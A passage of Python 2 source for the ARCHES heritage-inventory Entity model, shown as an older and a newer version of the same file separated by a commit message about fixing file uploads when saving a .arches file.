This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import uuid
import types
import copy
import arches.app.models.models as archesmodels
from django.contrib.gis.db import models
from django.contrib.gis.geos import fromstr
from django.contrib.gis.geos import GEOSGeometry
from django.db import connection
from django.db import transaction
from django.core.files.uploadedfile import InMemoryUploadedFile, TemporaryUploadedFile
from arches.app.models.concept import Concept
from arches.app.utils.betterJSONSerializer import JSONSerializer, JSONDeserializer
class Entity(object):
"""
Used for mapping complete entity graph objects to and from the database
"""
def __init__(self, *args, **kwargs):
self.property = ''
self.entitytypeid = ''
self.entityid = ''
self.value = ''
self.label = ''
self.businesstablename = ''
self.child_entities = [
# contains an array of other entities
]
if len(args) != 0:
if isinstance(args[0], basestring):
try:
uuid.UUID(args[0])
self.get(args[0])
except(ValueError):
self.load(JSONDeserializer().deserialize(args[0]))
elif isinstance(args[0], Entity):
self = args[0]
elif args[0] != None and isinstance(args[0], object):
self.load(args[0])
def __repr__(self):
return ('%s: %s of type %s with value %s') % (self.__class__, self.entityid, self.entitytypeid, JSONSerializer().serialize(self.value))
def __hash__(self):
if isinstance(self.value, GEOSGeometry):
return hash(tuple((self.entitytypeid, self.entityid, self.value.wkt, self.property)))
else:
return hash(tuple((self.entitytypeid, self.entityid, self.value, self.property)))
def __eq__(self, x):
return hash(self) == hash(x)
def __ne__(self, x):
return hash(self) != hash(x)
def get(self, pk, parent=None):
"""
Gets a complete entity graph for a single entity instance given an entity id
If a parent is given, will attempt to lookup the rule used to relate parent to child
"""
entity = archesmodels.Entities.objects.get(pk = pk)
self.entitytypeid = entity.entitytypeid_id
self.entityid = entity.pk
self.businesstablename = entity.entitytypeid.businesstablename if entity.entitytypeid.businesstablename else ''
# get the entity value if any
if entity.entitytypeid.businesstablename != None:
themodel = self._get_model(entity.entitytypeid.businesstablename)
themodelinstance = themodel.objects.get(pk = pk)
columnname = entity.entitytypeid.getcolumnname()
if (isinstance(themodelinstance, archesmodels.Domains)):
self.value = themodelinstance.getlabelid()
self.label = themodelinstance.getlabelvalue()
elif (isinstance(themodelinstance, archesmodels.Files)):
self.label = themodelinstance.getname()
self.value = themodelinstance.geturl()
else:
self.value = getattr(themodelinstance, columnname, 'Entity %s could not be found in the table %s' % (pk, entity.entitytypeid.businesstablename))
self.label = self.value
# get the property that associated parent to child
if parent is not None:
relation = archesmodels.Relations.objects.get(entityiddomain = parent.entityid, entityidrange = entity.entityid)
self.property = relation.ruleid.propertyid_id
# get the child entities if any
child_entities = archesmodels.Relations.objects.filter(entityiddomain = pk)
for child_entity in child_entities:
self.append_child(Entity().get(child_entity.entityidrange_id, entity))
return self
def _save(self):
"""
Saves an entity back to the db, returns a DB model instance, not an instance of self
"""
entitytype = archesmodels.EntityTypes.objects.get(pk = self.entitytypeid)
try:
uuid.UUID(self.entityid)
except(ValueError):
self.entityid = str(uuid.uuid4())
entity = archesmodels.Entities()
entity.entitytypeid = entitytype
entity.entityid = self.entityid
entity.save()
columnname = entity.entitytypeid.getcolumnname()
if columnname != None:
themodel = self._get_model(entity.entitytypeid.businesstablename)
themodelinstance = themodel()
themodelinstance.entityid = entity
self.businesstablename = entity.entitytypeid.businesstablename
# if we need to populate the E32 nodes then this is the code to do it,
# but it really slows down the save so i'm leaving it commented for now
# if (isinstance(themodelinstance, archesmodels.Domains)):
# setattr(themodelinstance, columnname, self.value)
# themodelinstance.save()
# concept = Concept(themodelinstance.val.conceptid).get_context()
# if concept:
# if len(self.child_entities) == 0:
# rule = archesmodels.Rules.objects.filter(entitytypedomain_id=self.entitytypeid)
# if len(rule) == 1:
# self.add_child_entity(rule[0].entitytyperange_id, rule[0].propertyid_id, concept.id, '')
# elif len(self.child_entities) == 1:
# self.child_entities[0].value = concept.id
if not (isinstance(themodelinstance, archesmodels.Files)):
setattr(themodelinstance, columnname, self.value)
themodelinstance.save()
self.label = self.value
if (isinstance(themodelinstance, archesmodels.Domains)):
self.value = themodelinstance.getlabelid()
self.label = themodelinstance.getlabelvalue()
else:
# Saving of files must be handled specially
# Because on subsequent saves of a file resource, we post back the file path url (instead of posting the file like we originally did),
# we want to prevent the path from being saved back to the database thus screwing up the file save process
if isinstance(self.value, (InMemoryUploadedFile, TemporaryUploadedFile)):
setattr(themodelinstance, columnname, self.value)
themodelinstance.save()
self.value = themodelinstance.geturl()
self.label = themodelinstance.getname()
for child_entity in self.child_entities:
child = child_entity._save()
rule = archesmodels.Rules.objects.get(entitytypedomain = entity.entitytypeid, entitytyperange = child.entitytypeid, propertyid = child_entity.property)
archesmodels.Relations.objects.get_or_create(entityiddomain = entity, entityidrange = child, ruleid = rule)
return entity
def _delete(self, delete_root=False):
"""
Deletes this entity and all it's children.
Also attempts to delete the highest parent (and any nodes on the way) of this node when I'm the only child and
my parent has no value.
if delete_root is False prevent the root node from deleted
"""
nodes_to_delete = []
# gather together a list of all entities that includes self and all its children
def gather_entities(entity):
nodes_to_delete.append(entity)
self.traverse(gather_entities)
# delete the remaining entities
for entity in nodes_to_delete:
self_is_root = entity.get_rank() == 0
if self_is_root and delete_root:
dbentity = archesmodels.Entities.objects.get(pk = entity.entityid)
#print 'deleting root: %s' % dbentity
dbentity.delete()
else:
parent = entity.get_parent()
parent_is_root = parent.get_rank() == 0
# print 'deleting: %s' % JSONSerializer().serializeToPython(entity, ensure_ascii=True, indent=4)
dbentity = archesmodels.Entities.objects.filter(pk = entity.entityid)
if len(dbentity) == 1:
dbentity[0].delete()
parent.child_entities.remove(entity)
# print 'deleted: %s' % dbentity[0]
# print 'parent: %s' % JSONSerializer().serializeToPython(parent, ensure_ascii=True, indent=4)
# now try and remove this entity's parent
if len(parent.child_entities) == 0 and parent.value == '' and not parent_is_root:
#print 'trying to delete parent node'
parent._delete()
def load(self, E):
"""
Populate an Entity instance from a generic python object
"""
self.property = E.get('property', '')
self.entitytypeid = E.get('entitytypeid', '')
self.entityid = E.get('entityid', '')
self.value = E.get('value', '')
self.label = E.get('label', '')
self.businesstablename = E.get('businesstablename', '')
for entity in E.get('child_entities', []):
child_entity = Entity()
self.append_child(child_entity.load(entity))
return self
def add_child_entity(self, entitytypeid, property, value, entityid):
"""
Add a child entity to this entity instance
"""
node = Entity()
node.property = property
node.entitytypeid = entitytypeid
node.value = value
node.entityid = entityid
self.append_child(node)
return node
def append_child(self, entity):
"""
Append a child entity to this entity instance
"""
parent = self
def func(self):
return parent
entity.get_parent = types.MethodType(func, entity, Entity)
self.child_entities.append(entity)
def merge(self, entitytomerge):
"""
Merge an entity graph into this instance at the lowest common node
"""
if self.can_merge(entitytomerge):
# update self.entityid if it makes sense to do so
if self.entityid == '' and entitytomerge.entityid != '':
self.entityid = entitytomerge.entityid
# update self.value if it makes sense to do so
if self.value == '' and entitytomerge.value != '':
self.value = entitytomerge.value
entities_to_merge = []
entities_to_append = []
# gather lists of entities that can be merged and ones that will be appended
for child_entitytomerge in entitytomerge.child_entities:
entities_to_append.append(child_entitytomerge)
for child_entity in self.child_entities:
if child_entity.can_merge(child_entitytomerge):
entities_to_merge.append(entities_to_append.pop())
break
for entity in entities_to_append:
self.append_child(entity)
for child_entity in self.child_entities:
for entity_to_merge in entities_to_merge:
if child_entity.can_merge(entity_to_merge):
child_entity.merge(entity_to_merge)
break
else:
self.get_parent().append_child(entitytomerge)
def can_merge(self, entitytomerge):
"""
A test to see whether 2 nodes can merge or not
"""
# if the nodes are equal attempt a merge otherwise don't bother
if (self.entitytypeid == entitytomerge.entitytypeid and self.property == entitytomerge.property):
# if the value of each node is not blank and they are not equal, then the nodes can't be merged
if self.value != '' and entitytomerge.value != '' and self.value != entitytomerge.value:
return False
return True
else:
return False
def merge_at(self, entitytomerge, entitytypeid):
"""
Merge an entity graph into this instance at the node type specified
If the node can't be found in self then merge the entity graph at Root
"""
selfEntities = self.find_entities_by_type_id(entitytypeid)
foundEntities = entitytomerge.find_entities_by_type_id(entitytypeid)
if len(selfEntities) == 1 and len(foundEntities) == 1:
for foundEntity in foundEntities[0].child_entities:
selfEntities[0].append_child(foundEntity)
# if you can't find the merge node in self then just merge at Root
if len(selfEntities) == 0 and len(foundEntities) == 1:
self.merge_at(entitytomerge, self.entitytypeid)
return self
def diff(self, entitytotest):
"""
Find all the entities in self that don't exist in entitytotest
(this represents entities that have effectively been deleted from entitytotest
when entitytotest is a version of self)
"""
ret = {'deleted_nodes':[], 'updated_nodes':[], 'inserted_nodes': []}
self_flattened = set(self.flatten())
entitytotest_flattened = set(entitytotest.flatten())
ret['deleted_nodes'] = list(entitytotest_flattened.difference(self_flattened))
ret['inserted_nodes'] = list(self_flattened.difference(entitytotest_flattened))
for inserted_entity in list(self_flattened.difference(entitytotest_flattened)):
for deleted_entity in list(entitytotest_flattened.difference(self_flattened)):
if inserted_entity.entityid == deleted_entity.entityid:
ret['inserted_nodes'].remove(inserted_entity)
ret['deleted_nodes'].remove(deleted_entity)
ret['updated_nodes'].append({'from': deleted_entity, 'to': inserted_entity})
return ret
def copy(self):
return copy.deepcopy(self)
def flatten(self):
"""
flattens the graph into a list of unordered entities
"""
ret = []
def gather_entities(entity):
if entity.get_rank() != 0:
entity.parentid = entity.get_parent().entityid
else:
entity.parentid = None
ret.append(entity)
copiedself = self.copy()
copiedself.traverse(gather_entities)
for item in ret:
item.child_entities = []
return ret
def find_entities_by_type_id(self, entitytypeid):
"""
Gets a list of entities within this instance of a given type
"""
ret = []
def appendValue(entity):
if entity.entitytypeid == entitytypeid:
ret.append(entity)
self.traverse(appendValue)
return ret
def traverse(self, func, scope=None):
"""
Traverses a graph from leaf to root calling the given function on each node
passes an optional scope to each function
Return a value from the function to prematurely end the traversal
"""
for child_entity in self.child_entities:
ret = child_entity.traverse(func, scope)
if ret != None:
# break???
return ret
if scope == None:
ret = func(self)
else:
ret = func(self, scope)
#break out of the traversal if the function returns a value
if ret != None:
return ret
def get_rank(self, rank=0):
"""
Get the rank of this instance (root is 0)
"""
if hasattr(self, 'get_parent'):
return self.get_parent().get_rank(rank+1)
return rank
def get_root(self):
"""
Get the root node of this instance
"""
if hasattr(self, 'get_parent'):
return self.get_parent().get_root()
return self
def set_entity_value(self, entitytypeid, value, append=False):
"""
Directly sets the value of a node in the graph
Will only set the value if the node exists and there is only one instance of that node or if the node doesn't exist it will be created
If append is set to True, the node will simply be appended next to other nodes of the same type
"""
entities = self.find_entities_by_type_id(entitytypeid)
if append or len(entities) == 0:
schema = Entity.get_mapping_schema(self.entitytypeid)
entity = Entity()
entity.create_from_mapping(self.entitytypeid, schema[entitytypeid]['steps'], entitytypeid, value)
self.merge_at(entity, schema[entitytypeid]['mergenodeid'])
return entity
if len(entities) == 1:
entities[0].value = value
return entities[0]
def create_from_mapping(self, entitytypeid, mappingsteps, leafentitytypeid, leafvalue, leafentityid=''):
currentEntity = self
currentEntity.entitytypeid = entitytypeid
for step in mappingsteps:
currentEntity.entityid = ''
value = ''
if step['entitytyperange'] == leafentitytypeid:
value = leafvalue
currentEntity = currentEntity.add_child_entity(step['entitytyperange'], step['propertyid'], value, leafentityid)
return self
@classmethod
def get_mapping_schema(cls, entitytypeid):
"""
Gets a complete entity schema graph for a single entity type given an entity type id
"""
ret = {}
mappings = archesmodels.Mappings.objects.filter(entitytypeidfrom = entitytypeid)
for mapping in mappings:
if mapping.entitytypeidto.pk not in ret:
ret[mapping.entitytypeidto.pk] = {'steps':[], 'mergenodeid': mapping.mergenodeid}
ret[mapping.entitytypeidto.pk]['steps'] = (Entity._get_mappings(mapping.pk))
return ret
@classmethod
def _get_mappings(cls, mappingid):
"""
Gets a single mapping given an mapping id
"""
ret = []
cursor = connection.cursor()
cursor.execute("""
SELECT
rules.entitytypedomain,
rules.entitytyperange,
rules.propertyid,
mapping_steps."order",
mappings.entitytypeidfrom,
mappings.entitytypeidto,
mapping_steps.mappingid
FROM
ontology.rules,
ontology.mapping_steps,
ontology.mappings
WHERE
mapping_steps.ruleid = rules.ruleid AND
mappings.mappingid = '%s' AND
mappings.mappingid = mapping_steps.mappingid
ORDER BY
mappings.entitytypeidfrom ASC,
mappings.entitytypeidto ASC,
mappings.mappingid ASC,
mapping_steps."order" ASC;
""" % (mappingid))
mapping_steps = cursor.fetchall()
for mapping_step in mapping_steps:
rule = {}
rule['entitytypedomain'] = mapping_step[0]
rule['entitytyperange'] = mapping_step[1]
rule['propertyid'] = mapping_step[2]
ret.append(rule)
return ret
def prune(self, entitytypes, action='disallow'):
"""
entitytypes is a list of entitytypeids allowed or dissallowed in the graph
if action=disallow (the default) then prune will remove all entities and their children from the entity graph that match the list of provided entitytypes
if action=allow then prune will pass through all entities and their parents from the entity graph that match the list of provided entitytypes
.. code-block:: python
# simple example of prunning a graph
entity.prune(['ARCHES RECORD.E31', 'PHASE TYPE ASSIGNMENT.E17', 'SPATIAL COORDINATES_GEOMETRY.E47', 'NAME.E41'])
# a more fully formed example of prunning a graph based on user permissions
fullgraph = set(entity.flatten())
from django.contrib.auth.models import User
user = User.objects.get(pk=1)
print user
if not user.is_superuser:
permissions = user.get_all_permissions()
entitytypes = []
for permission in permissions:
if permission.startswith('%s.read_' % entity.entitytypeid):
print permission.split('%s.read_' % entity.entitytypeid)[1]
entitytypes.append(permission.split('%s.read_' % entity.entitytypeid)[1])
entity.prune(entitytypes, action='allow')
prunedgraph = set(entity.flatten())
print fullgraph.intersection(prunedgraph)
print fullgraph.issuperset(prunedgraph)
print fullgraph.symmetric_difference(prunedgraph)
"""
if action == 'disallow':
self.filter(lambda entity: entity.entitytypeid not in entitytypes)
else:
self.filter(lambda entity: entity.entitytypeid in entitytypes)
return
# parent_entitytypes = set()
# flattened_graph = self.flatten()
# entities_to_prune = set()
# def gather_parent_entitytypes(entity):
# if entity.get_rank() == 0:
# return
# parent_entity = entity.get_parent()
# parent_entitytypes.add(parent_entity.entitytypeid)
# gather_parent_entitytypes(parent_entity)
# if action == 'disallow':
# for entity in flattened_graph:
# if entity.entitytypeid in entitytypes:
# entities_to_prune.add(entity)
# else:
# # if you passed in no entitytypes then you're basically saying remove all information from the graph
# if len(entitytypes) == 0:
# self.clear()
# return
# # first we need to loop through the graph to all the parents of entity to the list of allowed entitytypes
# for entity in flattened_graph:
# if entity.entitytypeid in entitytypes:
# gather_parent_entitytypes(entity)
# entitytypes = entitytypes + list(parent_entitytypes)
# for entity in flattened_graph:
# if entity.entitytypeid not in entitytypes:
# entities_to_prune.add(entity)
# # prune the remaining entities
# print 'entities to prune: %s' % entities_to_prune
# for entity in entities_to_prune:
# try:
# parent = entity.get_parent()
# print '\nremoving: %s' % entity
# parent.child_entities.remove(entity)
# except:
# if entity.get_rank() == 0:
# self.clear()
# return
self.trim()
def trim(self):
"""
recursively removes all nodes starting from the leaf that have no child_entities and no value
these nodes are assumed to be of no material value to the graph
"""
#somelist[:] = [tup for tup in somelist if determine(tup)]
# def func(entity):
# try:
# parent = entity.get_parent()
# print '-'*10
# print entity
# print len(parent.child_entities)
# if len(entity.child_entities) == 0 and entity.value == '':
# print JSONSerializer().serialize(entity, indent=4)
# parent.child_entities.remove(entity)
# print len(parent.child_entities)
# except:
# pass
# def func(entity):
# try:
# # http://stackoverflow.com/questions/1207406/remove-items-from-a-list-while-iterating-in-python
# parent = entity.get_parent()
# parent.child_entities[:] = [child_entity for child_entity in parent.child_entities if (len(child_entity.child_entities) != 0 or child_entity.value != '')]
# except:
# pass
#self.traverse(func)
self.filter((lambda entity: len(entity.child_entities) != 0 or entity.value != ''))
def filter(self, lambda_expression):
"""
Only allows the nodes defined in the lambda_expression to populate the entity graph
(eg: filters out of the entity graph any entity that doesn't return true from the lambda_expression)
"""
def func(entity):
if hasattr(entity, 'get_parent'):
parent = entity.get_parent()
parent.child_entities[:] = filter(lambda_expression, parent.child_entities)
# else:
# entity.child_entities[:] = filter(lambda_expression, entity.child_entities)
self.traverse(func)
def clear(self):
"""
resets this entity back to a clean state (does not delete the entity from the database)
"""
self.child_entities = []
self.entitytypeid = ''
self.entityid = ''
self.value = ''
@staticmethod
def _get_model(tablename):
"""
Helper to look up a model from a table name.
"""
try:
model_identifier = str('models.' + tablename)
Model = models.get_model(*model_identifier.split("."))
except TypeError:
Model = None
if Model is None:
raise TypeError(u"Invalid model identifier: '%s'" % model_identifier)
return Model
def dictify(self, keys=['label']):
"""
Takes an entity and turns it into recursive lists nested objects
Uses an in-built algorithm to derive which sub-branches appear to be grouped, and then flattens them out
A partial example output follows...
.. code-block:: python
[
{
"EVALUATION_CRITERIA_ASSIGNMENT_E13": [{
"STATUS_E55": [
{"STATUS_E55__label": "3D"},
{"STATUS_E55__label": "3CD"},
{"STATUS_E55__label": "5D3"}
]
}],
"BEGINNING_OF_EXISTENCE_E63": [{
"BEGINNING_OF_EXISTENCE_TIME-SPAN_E52": [{
"BEGINNING_OF_EXISTENCE_TIME-SPAN_E52__label": "",
"START_DATE_OF_EXISTENCE_E49__label": "1962-01-01T00:00:00"
}],
"BEGINNING_OF_EXISTENCE_TYPE_E55": [{
"BEGINNING_OF_EXISTENCE_TYPE_E55__label": "Built Date"
}]
}],
"NAME_E41": [{
"NAME_TYPE_E55__label": "Primary",
"NAME_E41__label": "3264 N WRIGHTWOOD DR"
}],
"PRODUCTION_E12": [{
"PHASE_TYPE_ASSIGNMENT_E17": [
{
"STYLE_E55": [{
"STYLE_E55__label": "Modern, Mid-Century"
}],
"HERITAGE_RESOURCE_TYPE_E55": [{
"HERITAGE_RESOURCE_TYPE_E55__label": "HP02. Single family property"
},{
"HERITAGE_RESOURCE_TYPE_E55__label": "House"
}],
"HERITAGE_RESOURCE_USE_TYPE_E55": [{
"HERITAGE_RESOURCE_USE_TYPE_E55__label": "Historic"
}]
}
]
}]
}
]
"""
data = {}
for child_entity in self.child_entities:
if child_entity.businesstablename != '':
data[child_entity.undotify()] = self.get_nodes(child_entity.entitytypeid, keys=keys)
else:
if child_entity.undotify() not in data:
data[child_entity.undotify()] = []
data[child_entity.undotify()].append(child_entity.dictify(keys=keys))
return data
def get_nodes(self, entitytypeid, keys=[]):
"""
Used by dictify to gather and flatten a single node (by entitytypeid) and all it's children
for example, a NAME.E41 node with a single child of NAME_TYPE.E55 would be transformed as below
.. code-block:: python
"NAME_E41": [{
"NAME_TYPE_E55__label": "Primary",
"NAME_E41__label": "3264 N WRIGHTWOOD DR"
}],
"""
ret = []
entities = self.find_entities_by_type_id(entitytypeid)
for entity in entities:
data = {}
for entity in entity.flatten():
data = dict(data.items() + entity.encode(keys=keys).items())
ret.append(data)
return ret
def encode(self, keys=[]):
"""
Encodes an Entity into a dictionary of keys derived by the entitytypeid of the Entity concatonated wtih property name
.. code-block:: python
{
"NAME_TYPE_E55__label": "Primary"
}
"""
ret = {}
for key, value in self.__dict__.items():
if key in keys:
ret['%s__%s' % (self.undotify(), key)] = value
return ret
def undotify(self):
return self.undotify_entitytypeid()
def undotify_entitytypeid(self):
return self.entitytypeid.replace('.', '_').replace('-', '___');
def to_json(self):
return JSONSerializer().serialize(self)
fix file upload during the save of a .arches file
'''
ARCHES - a program developed to inventory and manage immovable cultural heritage.
Copyright (C) 2013 J. Paul Getty Trust and World Monuments Fund
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import uuid
import types
import copy
import arches.app.models.models as archesmodels
from django.contrib.gis.db import models
from django.contrib.gis.geos import fromstr
from django.contrib.gis.geos import GEOSGeometry
from django.db import connection
from django.db import transaction
from django.core.files.uploadedfile import InMemoryUploadedFile, TemporaryUploadedFile
from arches.app.models.concept import Concept
from arches.app.utils.betterJSONSerializer import JSONSerializer, JSONDeserializer
class Entity(object):
"""
Used for mapping complete entity graph objects to and from the database
"""
def __init__(self, *args, **kwargs):
self.property = ''
self.entitytypeid = ''
self.entityid = ''
self.value = ''
self.label = ''
self.businesstablename = ''
self.child_entities = [
# contains an array of other entities
]
if len(args) != 0:
if isinstance(args[0], basestring):
try:
uuid.UUID(args[0])
self.get(args[0])
except(ValueError):
self.load(JSONDeserializer().deserialize(args[0]))
elif isinstance(args[0], Entity):
self = args[0]
elif args[0] != None and isinstance(args[0], object):
self.load(args[0])
def __repr__(self):
return ('%s: %s of type %s with value %s') % (self.__class__, self.entityid, self.entitytypeid, JSONSerializer().serialize(self.value))
def __hash__(self):
if isinstance(self.value, GEOSGeometry):
return hash(tuple((self.entitytypeid, self.entityid, self.value.wkt, self.property)))
else:
return hash(tuple((self.entitytypeid, self.entityid, self.value, self.property)))
def __eq__(self, x):
return hash(self) == hash(x)
def __ne__(self, x):
return hash(self) != hash(x)
def get(self, pk, parent=None):
"""
Gets a complete entity graph for a single entity instance given an entity id
If a parent is given, will attempt to lookup the rule used to relate parent to child
"""
entity = archesmodels.Entities.objects.get(pk = pk)
self.entitytypeid = entity.entitytypeid_id
self.entityid = entity.pk
self.businesstablename = entity.entitytypeid.businesstablename if entity.entitytypeid.businesstablename else ''
# get the entity value if any
if entity.entitytypeid.businesstablename != None:
themodel = self._get_model(entity.entitytypeid.businesstablename)
themodelinstance = themodel.objects.get(pk = pk)
columnname = entity.entitytypeid.getcolumnname()
if (isinstance(themodelinstance, archesmodels.Domains)):
self.value = themodelinstance.getlabelid()
self.label = themodelinstance.getlabelvalue()
elif (isinstance(themodelinstance, archesmodels.Files)):
self.label = themodelinstance.getname()
self.value = themodelinstance.geturl()
else:
self.value = getattr(themodelinstance, columnname, 'Entity %s could not be found in the table %s' % (pk, entity.entitytypeid.businesstablename))
self.label = self.value
# get the property that associated parent to child
if parent is not None:
relation = archesmodels.Relations.objects.get(entityiddomain = parent.entityid, entityidrange = entity.entityid)
self.property = relation.ruleid.propertyid_id
# get the child entities if any
child_entities = archesmodels.Relations.objects.filter(entityiddomain = pk)
for child_entity in child_entities:
self.append_child(Entity().get(child_entity.entityidrange_id, entity))
return self
def _save(self):
"""
Saves an entity back to the db, returns a DB model instance, not an instance of self
"""
is_new_entity = False
entitytype = archesmodels.EntityTypes.objects.get(pk = self.entitytypeid)
try:
uuid.UUID(self.entityid)
except(ValueError):
is_new_entity = True
self.entityid = str(uuid.uuid4())
entity = archesmodels.Entities()
entity.entitytypeid = entitytype
entity.entityid = self.entityid
entity.save()
columnname = entity.entitytypeid.getcolumnname()
if columnname != None:
themodel = self._get_model(entity.entitytypeid.businesstablename)
themodelinstance = themodel()
themodelinstance.entityid = entity
self.businesstablename = entity.entitytypeid.businesstablename
# if we need to populate the E32 nodes then this is the code to do it,
# but it really slows down the save so i'm leaving it commented for now
# if (isinstance(themodelinstance, archesmodels.Domains)):
# setattr(themodelinstance, columnname, self.value)
# themodelinstance.save()
# concept = Concept(themodelinstance.val.conceptid).get_context()
# if concept:
# if len(self.child_entities) == 0:
# rule = archesmodels.Rules.objects.filter(entitytypedomain_id=self.entitytypeid)
# if len(rule) == 1:
# self.add_child_entity(rule[0].entitytyperange_id, rule[0].propertyid_id, concept.id, '')
# elif len(self.child_entities) == 1:
# self.child_entities[0].value = concept.id
if not (isinstance(themodelinstance, archesmodels.Files)):
setattr(themodelinstance, columnname, self.value)
themodelinstance.save()
self.label = self.value
if (isinstance(themodelinstance, archesmodels.Domains)):
self.value = themodelinstance.getlabelid()
self.label = themodelinstance.getlabelvalue()
else:
# Saving of files must be handled specially
# Because on subsequent saves of a file resource, we post back the file path url (instead of posting the file like we originally did),
# we want to prevent the path from being saved back to the database thus screwing up the file save process
# This block should only be entered when initally uploading a file via the application, or when inserting records via a .arches file
if isinstance(self.value, (InMemoryUploadedFile, TemporaryUploadedFile)) or is_new_entity:
setattr(themodelinstance, columnname, self.value)
themodelinstance.save()
self.value = themodelinstance.geturl()
self.label = themodelinstance.getname()
for child_entity in self.child_entities:
child = child_entity._save()
rule = archesmodels.Rules.objects.get(entitytypedomain = entity.entitytypeid, entitytyperange = child.entitytypeid, propertyid = child_entity.property)
archesmodels.Relations.objects.get_or_create(entityiddomain = entity, entityidrange = child, ruleid = rule)
return entity
def _delete(self, delete_root=False):
"""
Deletes this entity and all it's children.
Also attempts to delete the highest parent (and any nodes on the way) of this node when I'm the only child and
my parent has no value.
if delete_root is False prevent the root node from deleted
"""
nodes_to_delete = []
# gather together a list of all entities that includes self and all its children
def gather_entities(entity):
nodes_to_delete.append(entity)
self.traverse(gather_entities)
# delete the remaining entities
for entity in nodes_to_delete:
self_is_root = entity.get_rank() == 0
if self_is_root and delete_root:
dbentity = archesmodels.Entities.objects.get(pk = entity.entityid)
#print 'deleting root: %s' % dbentity
dbentity.delete()
else:
parent = entity.get_parent()
parent_is_root = parent.get_rank() == 0
# print 'deleting: %s' % JSONSerializer().serializeToPython(entity, ensure_ascii=True, indent=4)
dbentity = archesmodels.Entities.objects.filter(pk = entity.entityid)
if len(dbentity) == 1:
dbentity[0].delete()
parent.child_entities.remove(entity)
# print 'deleted: %s' % dbentity[0]
# print 'parent: %s' % JSONSerializer().serializeToPython(parent, ensure_ascii=True, indent=4)
# now try and remove this entity's parent
if len(parent.child_entities) == 0 and parent.value == '' and not parent_is_root:
#print 'trying to delete parent node'
parent._delete()
def load(self, E):
"""
Populate an Entity instance from a generic python object
"""
self.property = E.get('property', '')
self.entitytypeid = E.get('entitytypeid', '')
self.entityid = E.get('entityid', '')
self.value = E.get('value', '')
self.label = E.get('label', '')
self.businesstablename = E.get('businesstablename', '')
for entity in E.get('child_entities', []):
child_entity = Entity()
self.append_child(child_entity.load(entity))
return self
def add_child_entity(self, entitytypeid, property, value, entityid):
"""
Add a child entity to this entity instance
"""
node = Entity()
node.property = property
node.entitytypeid = entitytypeid
node.value = value
node.entityid = entityid
self.append_child(node)
return node
def append_child(self, entity):
"""
Append a child entity to this entity instance
"""
parent = self
def func(self):
return parent
entity.get_parent = types.MethodType(func, entity, Entity)
self.child_entities.append(entity)
def merge(self, entitytomerge):
"""
Merge an entity graph into this instance at the lowest common node
"""
if self.can_merge(entitytomerge):
# update self.entityid if it makes sense to do so
if self.entityid == '' and entitytomerge.entityid != '':
self.entityid = entitytomerge.entityid
# update self.value if it makes sense to do so
if self.value == '' and entitytomerge.value != '':
self.value = entitytomerge.value
entities_to_merge = []
entities_to_append = []
# gather lists of entities that can be merged and ones that will be appended
for child_entitytomerge in entitytomerge.child_entities:
entities_to_append.append(child_entitytomerge)
for child_entity in self.child_entities:
if child_entity.can_merge(child_entitytomerge):
entities_to_merge.append(entities_to_append.pop())
break
for entity in entities_to_append:
self.append_child(entity)
for child_entity in self.child_entities:
for entity_to_merge in entities_to_merge:
if child_entity.can_merge(entity_to_merge):
child_entity.merge(entity_to_merge)
break
else:
self.get_parent().append_child(entitytomerge)
def can_merge(self, entitytomerge):
"""
A test to see whether 2 nodes can merge or not
"""
# if the nodes are equal attempt a merge otherwise don't bother
if (self.entitytypeid == entitytomerge.entitytypeid and self.property == entitytomerge.property):
# if the value of each node is not blank and they are not equal, then the nodes can't be merged
if self.value != '' and entitytomerge.value != '' and self.value != entitytomerge.value:
return False
return True
else:
return False
def merge_at(self, entitytomerge, entitytypeid):
"""
Merge an entity graph into this instance at the node type specified
If the node can't be found in self then merge the entity graph at Root
"""
selfEntities = self.find_entities_by_type_id(entitytypeid)
foundEntities = entitytomerge.find_entities_by_type_id(entitytypeid)
if len(selfEntities) == 1 and len(foundEntities) == 1:
for foundEntity in foundEntities[0].child_entities:
selfEntities[0].append_child(foundEntity)
# if you can't find the merge node in self then just merge at Root
if len(selfEntities) == 0 and len(foundEntities) == 1:
self.merge_at(entitytomerge, self.entitytypeid)
return self
def diff(self, entitytotest):
"""
Find all the entities in self that don't exist in entitytotest
(this represents entities that have effectively been deleted from entitytotest
when entitytotest is a version of self)
"""
ret = {'deleted_nodes':[], 'updated_nodes':[], 'inserted_nodes': []}
self_flattened = set(self.flatten())
entitytotest_flattened = set(entitytotest.flatten())
ret['deleted_nodes'] = list(entitytotest_flattened.difference(self_flattened))
ret['inserted_nodes'] = list(self_flattened.difference(entitytotest_flattened))
for inserted_entity in list(self_flattened.difference(entitytotest_flattened)):
for deleted_entity in list(entitytotest_flattened.difference(self_flattened)):
if inserted_entity.entityid == deleted_entity.entityid:
ret['inserted_nodes'].remove(inserted_entity)
ret['deleted_nodes'].remove(deleted_entity)
ret['updated_nodes'].append({'from': deleted_entity, 'to': inserted_entity})
return ret
def copy(self):
return copy.deepcopy(self)
def flatten(self):
"""
flattens the graph into a list of unordered entities
"""
ret = []
def gather_entities(entity):
if entity.get_rank() != 0:
entity.parentid = entity.get_parent().entityid
else:
entity.parentid = None
ret.append(entity)
copiedself = self.copy()
copiedself.traverse(gather_entities)
for item in ret:
item.child_entities = []
return ret
def find_entities_by_type_id(self, entitytypeid):
"""
Gets a list of entities within this instance of a given type
"""
ret = []
def appendValue(entity):
if entity.entitytypeid == entitytypeid:
ret.append(entity)
self.traverse(appendValue)
return ret
def traverse(self, func, scope=None):
"""
Traverses a graph from leaf to root calling the given function on each node
passes an optional scope to each function
Return a value from the function to prematurely end the traversal
"""
for child_entity in self.child_entities:
ret = child_entity.traverse(func, scope)
if ret != None:
# break???
return ret
if scope == None:
ret = func(self)
else:
ret = func(self, scope)
